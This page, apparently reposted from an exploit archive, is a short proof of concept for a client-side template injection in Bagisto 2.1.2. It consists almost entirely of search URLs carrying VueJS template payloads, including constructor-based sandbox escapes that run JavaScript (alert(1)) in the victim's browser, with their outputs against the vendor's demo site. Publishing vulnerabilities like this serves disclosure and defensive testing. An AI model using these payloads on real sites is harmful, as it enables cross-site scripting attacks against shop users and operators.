Home Tools Exploits & CVE's Bagisto 2.1.2 Client-Side Template Injection

Bagisto 2.1.2 Client-Side Template Injection

June 24, 2024

Authored by tmrswrr

Bagisto version 2.1.2 suffers from a client-side template injection vulnerability.

# Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)
# Date: 06/18/2024
# Exploit Author: tmrswrr
# Vendor Homepage: https://forums.bagisto.com/
# Version: 2.1.2
# Tested on: https://demo.bagisto.com/


https://demo.bagisto.com/bagisto-common/search?query={{7*7}}

49

https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}

A

https://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}

[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]

> Payloads for VueJS 3

https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}
https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}

> You will be see alert button

Bagisto 2.1.2 Client-Side Template Injection

LEAVE A REPLY Cancel reply

Follow us on Instagram @thecyberpost

EDITOR PICKS

Poultry Farm Management System 1.0 Shell Upload

Automad 2.0.0-alpha.4 Cross Site Scripting

SolarWinds Platform 2024.1 SR1 Race Condition

POPULAR POSTS

Oracle Database Password Hash Unauthorized Access

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

POPULAR CATEGORY

Responsive Tourism Website 3.1 Remote Code Execution

WordPress WP24 Domain Check 1.6.2 Cross Site Scripting

E-commerce Growisei CMS 2.0 Insecure Settings